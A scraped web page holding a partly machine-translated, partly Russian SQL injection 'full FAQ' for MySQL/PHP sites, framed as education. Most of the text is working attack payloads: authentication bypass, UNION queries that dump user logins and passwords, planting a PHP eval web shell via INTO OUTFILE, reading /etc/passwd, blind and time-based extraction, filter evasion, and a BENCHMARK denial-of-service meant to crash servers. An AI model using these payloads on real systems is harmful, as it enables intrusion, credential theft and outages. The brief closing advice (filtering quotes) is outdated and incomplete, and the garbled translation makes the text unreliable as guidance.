Special facilities

War Ukraine Russia

Hacking and protection ... SQL Injection ...

SQL Injection [full FAQ]

0.INTRO

1. HOW TO FIND SQL INJECTION

2. WHAT AND HOW IT CAN BE REMOVED FROM THIS USEFUL

3. WHAT IF THERE IS NO FIELD FIELD.

4. WHAT TO DO IF SOMETHING IS FILTERED.

5. USEFUL FUNCTIONS IN MYSQL

6. HOW TO PROTECT FROM SQL INJECTION

7. SUPPLEMENTS

0.INTRO

Laziv on the Internet in search of at least some kind of information on SQL injection you probably ran across the articles either very short, or not understandable, or illuminating one topic or something else that of course you did not like. When that and I collected somewhere 10-20 articles on this topic to get into many of the subtleties of this vulnerability. And then remembering those times I decided to write a full FAQ on this topic so that the rest did not suffer. And another request. Those who find that I missed something, where something was wrong, and so please write below, it's hard all the same, keep everything in mind

. By the way this is my first article, please do not throw tomatoes, and do not kick your feet.

Not the first day, taking a great interest in burglary, you probably know what SQL injection is, if not, I'm an article for you. SQL injection on just an injection is the type of attack in which the attacker modifies the original request to the database so that when the query is executed, the information it needs from the database is displayed.

To assimilate this article requires:
A) Having a brain
B) Straight arms
C) Knowledge of the SQL language

Basically this article was written both for MYSQL + PHP but there are a couple of examples with MSSQL.

In general, in my opinion the best way to learn how to work correctly with SQL injection is not to read this article, but a live practice , for example, to write the vulnerable script yourself, or use my one at the very end.

By the way, I advise you to read everything in a row because each paragraph has something important for the next item, etc.

1. HOW TO FIND SQL INJECTION

It's quite easy. It is necessary to insert into all fields, variables, cookies double and single quotes.

1.1 The second first

Let's start with this script

1 . Suppose that the original query to the database looks like this:
SELECT * FROM news WHERE id=' 1 '; Now we will add the quotation mark to the variable "id", like this: if the variable is not filtered and error messages are included, then something like:

Mysql_query (): You have an error in your SQL syntax; Check the manual that corresponds to your MySQL server version for the right syntax to use near '1' '

Since in the query to the database there will be an extra quotation mark:
SELECT * FROM news WHERE id=' 1' '; If the error report is turned off, in this case, you can determine the presence of the vulnerability like this (Also it would do well to prevent this from being confused with point 1.4, as described in the same paragraph): That is, the query to the database will be like this:
SELECT * FROM news WHERE id=' 1'; -- '; (For those who are in the tank "-" this is the sign of the beginning of the comment all after it will be discarded, I also want to draw your attention to the fact that there must be a space after it (So it is written in the documentation to MYSQL) and by the way in front of it too). Thus, for MYSQL, the query remains the same and the same is displayed as for http: //xxx/news.php? Id = 1
The whole point 2 is devoted to what to do with this vulnerability.

1.2 The second case

In SQL, there is a LIKE statement . It serves to compare strings. Here we allow the authorization script to enter the login and password requests the database like this:

SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123';

Even if this script filters the quotation mark, it still remains vulnerable to injection. Instead of the password, we just need to enter "%" (For the LIKE operator, the "%" character matches any string), and then the query becomes

SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%';

And we will be allowed inside with the login 'Admin'. In this case, we not only found the SQL injection but also successfully used it.

1.3 The third case

What to do if there is no quotation check in the same authorization script. It will be at least foolish to use this injection to output some information. Let's query the database will be of the type:

SELECT * FROM users WHERE login = 'Admin' AND pass = '123';

Unfortunately the password '123' does not fit

, But we found the injection is valid in the 'login' parameter and that to register under the nickname 'Admin' we need to enter something like Admin for it '; - that is, the part with the password check is discarded and we enter the nickname 'Admin'.

SELECT * FROM users WHERE login = ' Admin'; - 'AND pass =' 123 ';

And now what to do if the vulnerability in the 'pass' field. We enter into this field the following: 123 'OR login =' Admin '; - . The query will be:

SELECT * FROM users WHERE login = 'Admin' AND pass = '123' OR login = 'Admin'; - ';

What for the database will be absolutely indeterminate to such a request:

SELECT * FROM users WHERE (login = 'Admin' AND pass = '123') OR (login = 'Admin');

And after these actions we will become the full owner of the account with the login 'Admin'.

1.4 Fourth case

Let's return to the news script. From the SQL language, we must remember that the numeric parameters are not put in quotation marks, that is, with such a reference to the script http: //xxx/news.php? Id = 1 the query to the DB looks like this:

SELECT * FROM news WHERE id = 1 ;

To detect this injection, you can also substitute the quotation mark in the parameter 'id' and then the same error message will jump out:

Mysql_query (): You have an error in your SQL syntax; Check the manual that corresponds to your MySQL server version for the right syntax to use near '1' '

If this message does not vyprigivaet it can be understood that the quotation is filtered and then it is necessary to write http: //xxx/news.php? Id = 1 bla-bla-bla
DB will not understand this for bla bla bla and will give an error message like:

Mysql_query (): You have an error in your SQL syntax; 1 bla-bla-bla '(1 bla-bla-bla)

If the error report is turned off then check here http: //xxx/news.php? Id = 1; -
It should appear exactly like http: //xxx/news.php? Id = 1

Now you can proceed to step 2.

2. WHAT AND HOW IT CAN BE REMOVED FROM THIS USEFUL

Next, only the type of vulnerability described in paragraph 1.1 will be considered, and altered to the rest can be easy

2.1 The UNION team

For starters, the most useful is the UNION command (who does not know to go to Google ) ...
We modify the reference to the script http: //xxx/news.php? Id = 1 'UNION SELECT 1 - . The query to the database we get is like this:

SELECT * FROM news WHERE id = '1' UNION SELECT 1 - ';

2.1.1.1 Selection of the number of fields (Method 1)

Not forgetting about the fact that the number of columns before UNION and after must match for sure the error will come out (unless there is more than one column in the news table) like:

Mysql_query (): The used SELECT statements have a different number of columns

In this case, we need to pick up a number of columns (that would be their number before UNION and after matched). We do it this way:

Http: //xxx/news.php? Id = 1 'UNION SELECT 1, 2 -
Error. " The used SELECT statements have a different number of columns "

Http: //xxx/news.php? Id = 1 'UNION SELECT 1,2,3 -
Error again.
...

Http: //xxx/news.php? Id = 1 'UNION SELECT 1,2,3,4,5,6 -
ABOUT! It was displayed exactly the same as http: //xxx/news.php? Id = 1
Means the number of fields selected, that is, 6 pieces ...

2.1.1.2 Selection of the number of fields (Method 2)

And this method is based on the selection of the number of fields using GROUP BY . That is a request of this type:

Http: //xxx/news.php? Id = 1 'GROUP BY 2 -

It will be displayed without errors if the number of fields is less than or equal to 2.
We make a request of this type:

Http: //xxx/news.php? Id = 1 'GROUP BY 10 -

Oops ... There was a type error.

Mysql_query (): Unknown column '10' in 'group statement'

Hence the columns are less than 10. Divide 10 by 2. And make a query

Http: //xxx/news.php? Id = 1 'GROUP BY 5 -

There is no error, so the number of columns is greater than or equal to 5 but less than 10. Now, take the average value between 5 and 10, this turns out to be like 7. Do the query:

Http: //xxx/news.php? Id = 1 'GROUP BY 7 -

Oh again, a mistake ...

Mysql_query (): Unknown column '7' in 'group statement'

So the number is greater or equal to 5 but less than 7. Well, we continue to make a request

Http: //xxx/news.php? Id = 1 'GROUP BY 6 -

There are no errors ... So the number is greater than or equal to 6 but less than 7. Hence it follows that the required number of columns is 6.

2.1.1.3 Selecting the number of fields (Method 3)

The same principle as in clause 2.1.1.2 only uses the ORDER BY function. And the text of the error changes slightly if there are more fields.

Mysql_query (): Unknown column '10' in 'order clause'

2.1.2 Definition of output columns

I think that many of us just like a page like http: //xxx/news.php? Id = 1 will not work. So we need to make it so that on the first request nothing is output (before UNION ). The simplest thing is to change the "id" from "1" to "-1" (or to '9999999')
Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4,5,6 - Now we have some where in the page should be displayed any of these figures. (For example, since this is a conditionally news script, then in the "News Title" it will be displayed as 3, "News" -4 and so on). Now to get some information we need to replace these numbers in the script with the required functions. If the figures are not displayed anywhere, the remaining subparagraphs of clause 2.1 can be omitted.

2.1.3 SIXSS (SQL Injection CROSS Site Scripting)

This same XSS only through the request to the database. Example:
Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,' <script> alert ('SIXSS') </ script> ', 5,6 - Well, I think it's not difficult to understand that 4 in the page will be replaced with <script> alert ('SIXSS') </ script> and, accordingly, the same XSS.

2.1.4 Names of columns / tables

If you know the names of tables and columns in the database, you can omit this item
If you do not know ... There are two ways.

2.1.4.1 Names of columns / tables if there is access to INFORMATION_SCHEMA and if MYSQL version> = 5

Table INFORMATION_SCHEMA.TABLES contains information about all tables in the database, column TABLE_NAME-table names.
Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3, TABLE_NAME, 5,6 FROM INFORMATION_SCHEMA.TABLES - This may cause a problem. Since only the first row of the database response will be displayed. Then we need to use LIMIT like this:

Output of the first line:
Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3, TABLE_NAME, 5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 -

Output of the second line:
Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3, TABLE_NAME, 5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 2.1 - etc.

Well, we found the Users table. Only this ... ah ... the columns do not know ... Then the INFORMATION_SCHEMA.COLUMNS table comes to us. The column COLUMN_NAME contains the column name in the table TABLE_NAME . This is how we retrieve the column names

Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' Users' LIMIT 1,1 -

Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' Users' LIMIT 2.1 -
etc.

And now we found the login , password .

2.1.4.2 Names of columns / tables if there is no access to INFORMATION_SCHEMA

This is an asshole version

. Then the usual brutofors comes into force ... Example:

Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4,5,6 FROM Table_name -

You need to select the TableName until the following error message disappears:

Mysql_query (): Table ' Table_name ' does not exist

Well, we brought to their happiness. Users lost the error message, and the page was displayed as at http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4,5,6 - what does this mean ? This means that the Users table exists and you need to start sorting out the columns.

Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3, ColumnName , 5,6 FROM Users -

You need to select the ColumnName until the following error message disappears:

Mysql_query (): Unknown column ' ColumnName ' 'in' field list '

Where an error message disappears, such a column exists.

And so we found out that there are login , password columns in the Users table.

2.1.5 Output of information

Referring to the script in this manner http: //xxx/news.php? Id = -1 'UNION SELECT 1,2, login, password, 5,6 FROM Users LIMIT 1.1 - Displays us the login and password of the first user from the table Users .

2.2 Working with files

2.2.1 Write to file

Is in MYSQL such interesting function of type SELECT ... INTO OUTFILE allowing to write down the information in a file. Either this design SELECT ... INTO DUMPFILE they are almost similar and you can use any.

Example: http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4,5,6 INTO OUTFILE' 1.txt '; -

There are several restrictions for it.

Do not overwrite files
Requires FILE privileges
(!) Required are real quotes in specifying the file name

But what would prevent us from making the web go? Here is an example:

Http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,' <? Php eval ($ _ GET ['e'])?> ', 5,6 INTO OUTFILE' 1.php '; -

It remains only to find the full path to the root of the site on the server and finish it before 1.php. You can find another error on the report which will show the path on the server or leave it in the root of the server and pick it up with local includ, but that's another topic.

2.2.2 Reading Files

Consider the function LOAD_FILE

Example: http: //xxx/news.php? Id = -1 'UNION SELECT 1,2, LOAD_FILE (' etc / passwd '), 4,5,6;

There are also several restrictions for it.

The full path to the file must be specified.
Requires FILE privileges
The file must reside on the same server
The size of this file should be less than specified in max_allowed_packet
The file must be opened for reading by the user from under which MYSQL is started

If the function fails to read the file, it returns NULL.

2.3 DOS attack on SQL server

In most cases, the SQL server is finished because it can not do anything else. Type did not get to know the tables / columns, there are no rights to this, there are no rights to that, etc. I'm honestly against this method but still ...

Closer to the point ...
The BENCHMARK function performs the same action several times.

SELECT BENCHMARK (100000, md5 (current_time));

That is, here this function makes 100000 times md5 (current_time) that I have on my computer takes about 0.7 seconds ... It seemed that there is such ... And if you try the embedded BENCHMARK ?

SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (current_time))));

It takes a very long time to be honest, I did not even wait ... I had to do a reset

.
An example of Dosa in our case:

Http: //xxx/news.php? Id = -1 'UNION SELECT 1, 2, BENCHMARK (100000, BENCHMARK (100000, md5 (current_time)))), 4, 5, 6; -

It is enough to poke 100 F5 and "the server will fall into a sound down"))).

3. WHAT IF DO NOT BE ABSOLUTED.

3.1 By-character search

We need this case if http: //xxx/news.php? Id = 1 for different id will give us different results. For example http: //xxx/news.php? Id = 1 will be different from http: //xxx/news.php? Id = 0 if not, then this method is useless but finish reading is worth it.

As we remember the query to the database, it looks like this

SELECT * FROM news WHERE id = ' 1 ';

Now we modify it via the vulnerable parameter id before such a request (if something is unfamiliar, then go to step 5 and read):

SELECT * FROM news WHERE id = ' -1' OR id = IF (ASCII ((SELECT USER ()))> = 254, '1', '0') - ';

Like this:

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII ((SELECT USER ()))> = 254,' 1 ',' 0 ') -

What does this give us? To begin with, MYSQL executes a subquery SELECT USER () inserts it into the ASCII () function that returns the ascii code of the first character from the result of the subquery and the function IF () returns 1 if this code is greater than or equal to 100
The main request is to become

SELECT * FROM news WHERE id = '- 1' OR id = 1

And it is executed exactly the same way as when accessing the script http: //xxx/news.php? Id = 1 and if the code for this number is less then the main query becomes

SELECT * FROM news WHERE id = '- 1' OR id = 0

And is executed exactly as in http: //xxx/news.php? Id = 0 We call conditionally that the query returns 1 (yes) or 0 (no), respectively, and start sorting.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 100,' 1 ',' 0 ')
Aha returned 1 means the code of the first character is greater than or equal to 100. We try this:

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 200,' 1 ',' 0 ')
Returned 0 means 100 <= character code <200.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 150,' 1 ',' 0 ')
Again returned 0 means 100 <= character code <150.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 125,' 1 ',' 0 ')
And again returned 0 means 100 <= character code <125.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 113,' 1 ',' 0 ')
Returned 1 hence113 <= character code <125.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 118,' 1 ',' 0 ')
Returns 0 hence113 <= character code <118.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 115,' 1 ',' 0 ')
113 <= character code <115.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1) = 113,' 1 ',' 0 ')
Returned 0 means the character code is not equal to 113.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1) = 114,' 1 ',' 0 ')
Hooray! Returned 1 means the symbol code is equal to 114. We translate into a symbol and get the symbol "r". Now go to the next character.

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 2,1)> = 100,' 1 ',' 0 ')

And we repeat again all previous steps.

3.2 By-character search with BENCHMARK

What to do if there are no output fields and error reports turned off? To help us the function BENCHMARK . As it was written above, this function performs one action several times. Well, what do you ask ... But what. Recall that the query

SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (NOW ())));

It's sooo long, and on the basis of delays (no, do not be afraid of the delays that now thought) we will randomly sort through some parameter, let's say the name of the user under which we are connected to the database (it is displayed by the USER () function).

Http: //xxx/news.php? Id = -1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1)))> = 100, 1, BENCHMARK (2999999, MD5 (NOW ()))) -

The query will be:

SELECT * FROM news WHERE id = ' -1' OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1)))> = 100, 1, BENCHMARK (2999999, MD5 (NOW ())) ) - ';

And now, by analogy with the previous paragraph, we'll go through the string USER () . Only in this case, instead of 0, the function will perform this request for a very long time, which will tell us that the request returned 0 and accordingly if without any delays the request returns 1 .

Now let's talk about the delay time. In order to determine the return time 0 and 1, you need to make several preliminary requests:

Http: //xxx/news.php? Id = -1 'OR id = IF (99> 100, 1, BENCHMARK ( 2999999 , MD5 (NOW ())))

Will return 0 . It is necessary to note the time. Depending on the width of your channel, you need to select the number 2999999 to the extent that you can accurately judge whether there was a delay or not compared to

Http: //xxx/news.php? Id = -1 'OR id = IF (101> 100, 1, BENCHMARK (2999999, MD5 (NOW ())))

Which will return 1 .

The huge disadvantage is that BENCHMARK -we are very heavily load servak.

ATTENTION! In this case, the main thing is not to forget that after every BENCHMARK execution, the SQL server needs to be given some rest time. (A little more than the very implementation of BENCMARK -a). Otherwise, the results of this search may be incorrect.

3.3 Brute-force search using the error report

This item is written on the basis of ( based on, without reprints! ) The article "New Alternative Benchmark'y or effective blind SQL injection" by Elekt , Respect to him.

This method is based on the fact that instead of returning 0 , a subquery is performed which causes an error and it is possible to judge by the output of errors that it returned 0 and by the absence of an error that it returned 1 . This method will help us if there are no output fields but an error report is included (!) .

SELECT * FROM news WHERE id = '- 1' OR id = (SELECT 1 UNION SELECT 2)

What do you think that will return this request? Correctly a mistake as id is compared with a subquery which returns two lines.

Mysql_query (): Subquery returns more than 1 row

It was a theory. Now we turn to the query with which we will go through the symbols

SELECT * FROM news WHERE id = ' -1' OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1)))> = 100, 1, (SELECT 1 UNION SELECT 2)) - ;

As can be seen from this query, if the character code is greater than or equal to 100, the IF () function returns 1 , and then does not void, and if the function performs a subquery

SELECT 1 UNION SELECT 2

Which returns two lines that when compared with id causes an error and we understand that the query returned 0 .

A huge disadvantage of this method is that huge amounts of errors accumulate in the logs. And a huge plus is the speed of work.

3.4 Injection after ORDER BY

For some reason, many thought that it was a hopeless case. Well, let's change this opinion to the opposite. Let's say that the query looks like this:

SELECT * FROM news ORDER BY $ by

Well and as always there is a variable $ by does not pass filtering, and on the page some lines from a DB are deduced. Well, we need to get two queries that would somehow change the output to the page, but still the queries must be such that you can influence the result by using subqueries. What such requests can become
Http: //xxx/news.php? By = (id * 1)
Http: //xxx/news.php? By = (id * -1)
I hope as you guessed the second time the sample will go "from top to bottom" regarding the first query, to understand why it is not difficult. Let's assume for the first time that it was deduced, we will accept it for the truth :

The first news The second news The third news

And in the second lie :

The third news The second news The first news

Well, the request for the name of the current user's current name will look like this:
Http: //xxx/news.php? By = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 112,1, -1))
Well brought back the order of the news => lie
Http: //xxx/news.php? By = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 113,1, -1))
Again lie
Http: //xxx/news.php? By = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 114,1, -1))
ABOUT! Direct order of news => truth
We translate the symbol code 114 into the symbol r. Go to the next character and so on.

4.What to do if something is filtered.

4.1 A space is filtered

Well, first of all, remember that for SQL, the type of / ** / is equal to a space. And also you can go to item 4.2.

4.2 The symbol / line is filtered

Есть интересная функция которая возвращает по коду символа сам символ.Предположим фильтруется символ... ну пускай будет звездочка (*). Для начала нам нужно узнать код этого символа. В MYSQL есть функция ASCII() возвращает код самого левого символа из переданной ей строке юзается так

SELECT ASCII('*');

только на уязвимом хосте этого делать смысла нет (Символ '*' фильтруется) это нужно сделать на локалке. Узнаем что код равен 42 и юзаем функцию CHAR() так

SELECT CHAR(42, 42, 42);

Выведет три звездочки.Еще один способ это использовать 16-ричный код символа. Теперь предположим что фильтруется солово 'login'. В MYSQL есть функция HEX() которая выдает 16-ричный код строки. Юзается так

SELECT HEX('login');

Выдаст '6C6F67696E' впереди дописываем "0x" (Чтобы SQL понял что имеет дело с 16-ричной кодировкой) и получаем '0x6C6F67696E ' это юзать без CHAR() так

SELECT 0x6C6F67696E FROM User;

либо с так

SELECT CHAR(0x6C,0x6F,0x67,0x69,0x6E) FROM User;

5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL

Надеюсь что за SELECT, INSERT, UPDATE, DELETE, DROP вы знаете, если нет то лезем в эту книжку читать: google.com (Большой справочник языку SQL).

----------------------------
USER() -функция выводит логин юзера под которым мы подключены к MYSQL
DATABASE() -функция выводит название БД к которой мы подключены
VERSION() -выводит версию MYSQL
----------------------------
ASCII( str ) -возвращает ASCII код первого символа в строке "str"
CHAR( xx1,xx2,... ) -возвращает строку состоящую из сомволов ASCII коды которых xx1, xx2 и т.д.
HEX( str ) -возвращает 16-ричный эквивалент строки "str".
----------------------------
LENGTH( str ) - Возвращает длину строки "str".
SUBSTRING( str,pos[,len] ) -Возвращает подстроку длиной len(если не указан то до конца строки "str") символов из строки "str", начиная от позиции pos.
LOCATE( substr,str[,pos] ) -Возвращает позицию первого вхождения подстроки "substr" в строку "str" начиная с позиции pos(если не указанно то с начала строки "str"). Если подстрока "substr" в строке "str" отсутствует, возвращается 0.
----------------------------
LOWER( str ) -переводит в нижний регистр строку "str"(по-моему только латиницу)
CONCAT( param1,param2,... ) -объединение подстрок в одну строку.
CONCAT_WS( sep,param1,param2,... ) -объединение подстрок в одну строку c разделителем "sep".
----------------------------
IF( exp,ret1,ret2 ) -Проверяет условие exp если оно верно (не равно 0) то возвращает строку ret1 а если нет то возвращает строку ret2.
----------------------------
expr BETWEEN min AND max -Если величина выражения expr больше или равна заданному значению min и меньше или равна заданному значению max, то функция BETWEEN возвращает 1, в противном случае - 0.
----------------------------
AES_DECRYPT(AES_ENCRYPT( 'строка' , 'bla' ), 'bla' ) Часто бывают траблы с кодировкой и можно чтобы сильно не заморачиваться используют эту конструкцию.
----------------------------

Теперь о комментариях в Mysql
1) # символ начала комментария в MySQL. Example:

SELECT pass,login FROM users #This is comment

что аналогично запросу

SELECT pass,login FROM users

2) -- еще один вариант комментария в MySQL. Обязателен пробел после этого знака. Example:

SELECT pass,login FROM users -- This is comment

3) /* */ аналог комментария СИ в MySQL. Закрывающая часть необязательна. Для MySQL индеинтична пробелу. Examples:

SELECT pass,login FROM users /*This is comment SELECT pass,login /*This is comment*/ FROM users SELECT /**/ pass,login /**/ FROM /**/ users

4) /*!int*/ Расширение предыдущего комментария. Все заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше. Example:

SELECT pass /*!32302 ,login*/ FROM users

Выведет столбец login если версия MySQL равна либо выше 3.23.02

6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION

Вы конечно понимаете что именно для этого пункта и писалась вся эта статья. Все пункты и их подпункты были написанны лишь для того что бы понять все серьезнось ситуации, а за использование этих пунктов в целях противоречащих УКРФ автор данной статьи ответственность не несет.

А защитится очень просто. Кстати все три правила относятся к трем способам передачи информации серверу GET, POST, Cookie.

1)САМОЕ ГЛАВНОЕ ФИЛЬТРОВАТЬ КАВЫЧКИ.
-------------------------------
2)Если используется оператор сравнения строк LIKE фильтровать знаки “%” и “_”
-------------------------------
3)Не использовать при сравнении прерменных без кавычек типа SELECT …WHERE id=$id а использовать так SELECT ...WHERE id='$id' и обратиться к пункту 1

Expand / Collapse

Comments

When commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.

'); var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = 'https://ad.admitad.com/shuffle/e61acebe19/'+subid_block+'?inject_to='+injectTo; var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(s, x); })();

All news

Site
Forum

How our favorite products looked before they were collected Photo 2017-03-10
The Japanese "Virginity Killer" Photo 2017-03-10
How to choose the right wine for your dish Photo 2017-03-08
How to dress by age and not look stupid Photo 2017-03-08
Sexual variant "Follow me" Photo 2017-03-08
Plate of healthy food Photo 2017-03-08
NASA has opened free access to its software Photo 2017-03-08
Kate Moss, the main beauty of the generation, the femme fatale Photo 2017-03-08
101 Method of application of the paracord Photo 2017-03-05
Everything you wanted to know about tires. Marking, types, seasonality Photo 2017-03-05
How to choose quality natural spices and spices Photo 2017-03-04
Emma Watson (26 years) undressed for the March Vanity Fair Photo 2017-03-04
Emma Watson (Emma Watson) undressed for Natural Beauty Photo 2017-03-04
Tattoo with the image of famous heroes Photo 2017-03-03
Scheme of all municipal transport in Kiev Photo 2017-02-28
How often to have sex according to age Photo 2017-02-28
Fisherman's calendar and forecast of the biting of peaceful / predatory fish for 2017 Photo 2017-02-26
Fishing knots, how to tie a hook, prepare for summer Photo 2017-02-26
Euthanasia Coaster, a project of roller coasters designed for the death penalty Photo 2017-02-26
VEB Page can be evidence in court Photo 2017-02-26
In such a cosplay, you yourself will want to play Photo 2017-02-25
A smart selection of girls from Japan. Photo 2017-02-25
GOI paste (from GOI - State Optical Institute) Photo 2017-02-24
Unnecessary things, which you should quickly get rid of Photo 2017-02-24
Harmful daily habits, because of which there is bloating Photo 2017-02-24
The levers of control of aircraft engines (ORE), it is not enough ... Photo 2017-02-24
Modern design of the Business card Photo 2017-02-23
Cats, artist Vladimir Rumyantsev Photo 2017-02-23
Interesting facts about the film Prometheus Photo 2017-02-23
What did the NASA conference say? Photo 2017-02-21
The format of the SSL certificate, how to convert the certificate to .pem, .cer, .crt, .der, pkcs or pfx Photo 2017-02-21

How our favorite products looked before they were collected We studied the fruits and vegetables that we buy in the supermarket, ... Photo 2017-03-10
Japanese "Virginity Killer" In Japan, a new trend: a sweater called Virgin-Killing Sweater or ... Photo 2017-03-10
How to choose the right wine for your dish The rule "red for meat, white for fish" is in effect ... Photo 2017-03-08
How to dress by age and not look stupid How long have you felt? Go, I suppose, like a pimple ... Photo 2017-03-08
Sexual version of "Follow Me" A few years ago, Russian photographers Murad and Natalia Osman created ... Photo 2017-03-08
A plate of healthy food Harvard University and modern science conducts numerous studies to optimize ... Photo 2017-03-08
NASA has opened free access to its software NASA has opened free access to the software catalog 2017-2018. How to ... Photo 2017-03-08
Kate Moss, the main beauty of the generation, the fatal woman Every generation has its own main beauty, a fatal woman, who ... Photo 2017-03-08
101 Paracord method of use For most people the paracord is known as a very convenient device with ... Photo 2017-03-05
Everything you wanted to know about tires. Marking, types, seasonality Tires are the main link between the car and the road. From the ... Photo 2017-03-05
How to choose quality natural spices and spices How to choose natural spices and spices in the market or in ... Photo 2017-03-04
Emma Watson (26 years old) undressed for the March Vanity Fair Emma undressed for the March Vanity Fair, true, on the cover ... Photo 2017-03-04
Emma Watson (Emma Watson) undressed for the book Natural Beauty Emma decided to do this for the book Natural Beauty! And she ... Photo 2017-03-04
A tattoo featuring famous heroes A bitane tattoo artist creates incredibly realistic tattoos with images of famous heroes ... Photo 2017-03-03
Scheme of all municipal transport in Kiev The scheme indicates all buses, trolleybus and tram routes, and ... Photo 2017-02-28
How often you need to have sex according to age Many are curious to know if they are having sex too much or too much ... Photo 2017-02-28
The calendar of the fisherman and the forecast of the biting of peaceful / predatory fish for 2017 There are certain phases of the luminary when you just need to be alone ... Photo 2017-02-26
Fishing knots how to tie a hook, prepare for the summer The type of knot is chosen taking into account the type of fishing line used (monofilament or ... Photo 2017-02-26
Euthanasia Coaster, a project of roller coasters designed for the death penalty The author acknowledges that the roller coaster is not the optimal machine for the ... Photo 2017-02-26
VEB Page can be evidence in court It is necessary to understand that, for example, copyrights are violated not by the existing ... Photo 2017-02-26
In such a cosplay, you yourself will want to play The main prototypes of a costume game - cartoon characters, anime, video games, movies, ... Photo 2017-02-25

Cats. Artist Vladimir Rumyantsev. Photo 2017-02-23
Prometheus - Interesting Facts Photo 2017-02-23
Did you see the Lithuanian Cheerleaders? Worth Seeing! 2017-02-23
Olsen, Elizabeth / Elizabeth Olsen Photo 2017-02-23
She sat at the Window, And He Entered Her Car ... Photo 2017-02-23
Photo of Cats, Cats, Kitties Photo 2017-02-23
How the Turtle Can Run Photo 2017-02-23
Bengal Cat Talking With a Kitten 2017-02-23
National Bank Introduces New Coin to Circulation (Photo) Photo 2017-02-23
Protasov Yar 30 Years Ago Photo 2017-02-23
Photo of the Animals Photo 2017-02-23
Nasa Broadcast What's Reported At the Nasa Photo Conference 2017-02-23
Something, Size With Jupiter, Rushing "Through" the Sun Photo 2017-02-22
Central Streets of Kiev Will Be Blocked For Five Days Photo 2017-02-20
3 Folk Ways to Make the Vagina Narrow And Elastic Photo 2017-02-20
Monica Bellucci In The Magazine Gq Italy, February 2017 Photo 2017-02-20
The Serebro Group In Maxim Magazine, March 2017 Photo 2017-02-20
What to Do If You Have been Detained by Police - 146 Article Piracy Photo 2017-02-20
New Free Os has appeared Photo 2017-02-18
Wood Under the Electron Microscope Photo 2017-02-18
The Market of Payment Cards In 2016, Demonstrated a Significant Growth Photo 2017-02-18

Social

Your IP: 66.249.93.28
Your Country: European Union

Free 50 UAH for your Monobank card?

SQL Injection [full FAQ]

0.INTRO

1. HOW TO FIND SQL INJECTION

4.What to do if something is filtered.

5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL

6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION

7.ДОПОЛНЕНИЯ

Comments